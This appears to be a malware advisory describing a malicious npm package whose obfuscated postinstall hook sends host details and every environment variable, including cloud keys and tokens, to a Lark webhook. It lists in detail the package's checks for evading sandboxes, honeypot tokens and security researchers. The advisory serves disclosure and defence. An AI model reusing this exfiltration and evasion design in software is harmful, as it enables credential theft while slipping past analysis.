MAL-2026-6597

This npm package is purpose-built malware that exfiltrates host information and environment secrets. It runs as a postinstall hook (the keyword "postinstall" is obfuscated in the code) and bails immediately if npm_package_name is unset, confirming it only fires during npm install. After a randomized 15-45 second delay it collects host info (hostname, username, platform, Node version, non-internal IPs, and the registry URL) and dumps the entire process.env -- which in CI and developer environments routinely contains tokens, AWS keys, and other secrets -- then POSTs it all to an attacker-controlled endpoint. The C2 destination is obfuscated two ways: the host decoder (reverse + subtract 7) yields open.feishu.cn, and the payload is formatted as a Feishu/Lark bot webhook message (msg_type: "text"), so stolen data lands in an attacker's Lark chat. The exfiltration path is XOR-decoded with the key "Zk9x". The bulk of the code is anti-analysis: it silently calls process.exit(0) if it detects honeypot canary tokens (AKIAIOSFODNN7EXAMPLE and the matching AWS example secret, fake-token regexes like F4k3T0k3n, "honey"), researcher/sandbox env vars and prefixes (DetonationLogFilePath, PYPI_POISON_HONEY_TOKEN, THREAT_ANALYZER_MODEL, ASPECT_TLOG, and prefix scans for SANDYCLAW_, OPENCLAW_, PERMISO_, CHAINRADAR_), a resolved-registry string containing "supplysec", NODE_OPTIONS with a --require hook, mock CA paths under /tmp/mock, the NODE_TLS_REJECT_UNAUTHORIZED/profiling combo, 3 or more CI providers set at once (GitHub Actions, GitLab, CircleCI, Buildkite), sandbox hostnames (detonat|cuckoo|virus|scan|chainradar), sandbox usernames (sandbox, malware, scan, etc.), or a HOME path containing "openclaw". The char-code/XOR/reverse encoding and the "Build Environment Telemetry" comments exist purely to hide the env-var names, the C2 host, and the path from casual review and log scanners.